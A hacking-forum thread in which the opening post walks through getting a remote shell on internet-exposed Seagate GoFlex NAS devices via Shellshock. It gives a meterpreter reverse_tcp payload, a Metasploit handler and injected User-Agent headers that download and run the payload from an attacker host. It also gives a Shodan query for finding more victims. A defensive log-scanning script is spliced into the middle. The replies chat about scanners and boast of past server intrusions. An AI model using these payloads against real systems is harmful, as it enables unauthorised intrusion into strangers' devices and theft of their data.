Topic: Getting a remote shell on any one of 68,000+ Seagate GoFlex devices

AnarchyAngel
I have been scanning some ranges in my free time and came across a Seagate GoFlex Home Network Storage System which my scanner flagged as being vulnerable to Shellshock, but getting a remote shell was no easy task "for me anyway". I ended up having to build a payload with msfvenom, doing the execution using Burp Suite and handling the shell with the Metasploit handler. The best part is this device uses UPnP to tunnel to the Internet, giving us easy access >;)

Start with the payload:

Code:
msfvenom -p php/meterpreter/reverse_tcp lport=4444 lhost=1.2.3.4 >msf.txt

Now upload msf.txt to your web server. After the payload is uploaded open Metasploit and

Code:
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
run

That should start up our listener. Now we need to open up burp and use the repeater. Enter the following for the request:

Code:
GET /support/ HTTP/1.1
Host: 5.6.7.8
User-Agent: () { :; }; echo Content-Type: text/plain; echo; echo; PATH=/usr/bin:/usr/local/bin:/bin; export PATH; wget http://1.2.3.4/msf.txt -O /tmp/msf.php2>&1;
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive

Also don't forget to configure the target correctly. Hit go and wait a few seconds and you should see some wget output and if all went well you should now have uploaded msf.php to the /tmp/ dir of the device. Now we just need to execute it. For this we use burp again. This time put this in the request:

Code:
GET /support/ HTTP/1.1
Host: 5.6.7.8
User-Agent: () { :; }; echo Content-Type: text/plain; echo; echo; PATH=/usr/bin:/usr/local/bin:/bin; export PATH; php /tmp/msf.php;
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive

This time when you hit Go, and your ports are forwarded correctly, you should be able to go back to our msfconsole window and see a session has opened. You won't have root at this point but you can still do a lot of fun stuff. You can find some of these devices on Shodan by searching for "hipname=". If anyone figures out how to get root please share :) Enjoy!

*Count of vulnerable devices taken from Shodan search results, not actual testing.
**I did not test it but you could try to use linux/x86/exec payload in bash bug exploit module to deploy and execute. This would allow you to keep it all in metasploit.

Original post - http://aahideaway.blogspot.com/2015/11/getting-remote-shell-on-any-one-of.html
Check it out for more information on this and other posts.
https://dc414.org - MKE area DEFCON group
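
For defenders, requests like the two in the post above leave a recognizable trace in web server access logs: the Bash function-definition prefix `() {` inside a header value. The Python below is an added example, not part of the original post; it assumes the server writes combined-format access logs, and the log lines, client addresses and timestamps are constructed.

```python
import re

# Bash function-definition prefix abused by Shellshock; spacing varies between tools.
FUNC_PREFIX = re.compile(r"\(\s*\)\s*\{")
# Combined log format: ip ident user [time] "request" status bytes "referer" "agent"
COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)
URL = re.compile(r"https?://[^\s;\"']+")

def scan(lines):
    """Return one finding per request whose request line or headers carry the prefix."""
    findings = []
    for line in lines:
        m = COMBINED.match(line)
        if not m:
            continue  # not combined format; a real pipeline would count these
        hits = [f for f in ("request", "referer", "agent") if FUNC_PREFIX.search(m[f])]
        if hits:
            injected = " ".join(m[f] for f in hits)
            findings.append({
                "src": m["ip"], "time": m["time"], "status": m["status"],
                "fields": hits,
                # URLs inside the injected command are second-stage fetches to block and hunt for
                "staged_urls": URL.findall(injected),
            })
    return findings

# Constructed sample lines modelled on the two requests in the post (addresses are placeholders).
SAMPLE = [
    '192.0.2.10 - - [19/Nov/2015:21:04:11 +0000] "GET /support/ HTTP/1.1" 200 312 "-" '
    '"() { :; }; echo; wget http://1.2.3.4/msf.txt -O /tmp/msf.php;"',
    '192.0.2.10 - - [19/Nov/2015:21:04:40 +0000] "GET /support/ HTTP/1.1" 200 0 "-" '
    '"() { :; }; echo; php /tmp/msf.php;"',
    '198.51.100.7 - - [19/Nov/2015:21:05:02 +0000] "GET /support/ HTTP/1.1" 200 5120 "-" '
    '"Mozilla/5.0 (X11; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

A hit only shows that the request was sent; whether the device ran the injected command has to be confirmed on the device itself, for example by checking for unexpected files under /tmp.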

Ragnar
Re: Getting a remote shell on any one of 68,000+ Seagate GoFlex devices
« Reply #1 on: November 20, 2015, 03:22:04 am »
Hey, great project. You talked about a "scanner". Can you explain it more? What kind of scanner do you have?

I have been scanning some ranges in my free time and came across a Seagate GoFlex Home Network Storage System which my scanner flagged as being vulnerable to shellshock but getting a remote shell was no easy task "for me anyway".

Dr4g0n
Re: Getting a remote shell on any one of 68,000+ Seagate GoFlex devices
« Reply #2 on: November 20, 2015, 03:43:10 am »
Hey, great project. You talked about a "scanner". Can you explain it more? What kind of scanner do you have?

My guess would be, if he is scanning across the internet, it's either masscan or nmap, those are the two that would either be the most popular or be the fastest to scan for mass exploitation.
I asked for nothing, and that's just what I got.


AnarchyAngel
Re: Getting a remote shell on any one of 68,000+ Seagate GoFlex devices
« Reply #3 on: November 22, 2015, 03:41:02 am »
My guess would be, if he is scanning across the internet, it's either masscan or nmap, those are the two that would either be the most popular or be the fastest to scan for mass exploitation.

good guess, but i was using openvas because it was a smaller scope "the ranges i was scanning" and i like its reporting.

Dr4g0n
Re: Getting a remote shell on any one of 68,000+ Seagate GoFlex devices
« Reply #4 on: November 22, 2015, 03:52:00 am »
good guess, but i was using openvas because it was a smaller scope "the ranges i was scanning" and i like its reporting.

Ah, I've never heard of that tool, wish it was open source.


m0rph
Re: Getting a remote shell on any one of 68,000+ Seagate GoFlex devices
« Reply #5 on: November 22, 2015, 04:21:10 am »
You know, I seem to remember rooting a hosting server on a Russian ISP called ROPNet a couple of years back, and sitting on it for a few months when all of a sudden it was owned at a lower level by a perl bot written by a group called Angels of Anarchy or Anarchy Angels...something like that. They were American and most of them from Wisconsin. I don't suppose you would know anything about that would you OP?
The code is strong with this one.

AnarchyAngel
Re: Getting a remote shell on any one of 68,000+ Seagate GoFlex devices
« Reply #6 on: November 22, 2015, 05:08:03 am »
Ah, I've never heard of that tool, wish it was open source.

it is open source. - http://www.openvas.org/

AnarchyAngel
Re: Getting a remote shell on any one of 68,000+ Seagate GoFlex devices
« Reply #7 on: November 22, 2015, 05:08:47 am »
You know, I seem to remember rooting a hosting server on a Russian ISP called ROPNet a couple of years back, and sitting on it for a few months when all of a sudden it was owned at a lower level by a perl bot written by a group called Angels of Anarchy or Anarchy Angels...something like that. They were American and most of them from Wisconsin. I don't suppose you would know anything about that would you OP?

maybe, maybe not.  :P

Dr4g0n
Re: Getting a remote shell on any one of 68,000+ Seagate GoFlex devices
« Reply #8 on: November 22, 2015, 06:16:05 am »
it is open source. - http://www.openvas.org/

Fucking google-fu was weak today, lol, thanks.


AnarchyAngel
Re: Getting a remote shell on any one of 68,000+ Seagate GoFlex devices
« Reply #9 on: November 22, 2015, 06:28:08 am »
Fucking google-fu was weak today, lol, thanks.

no problem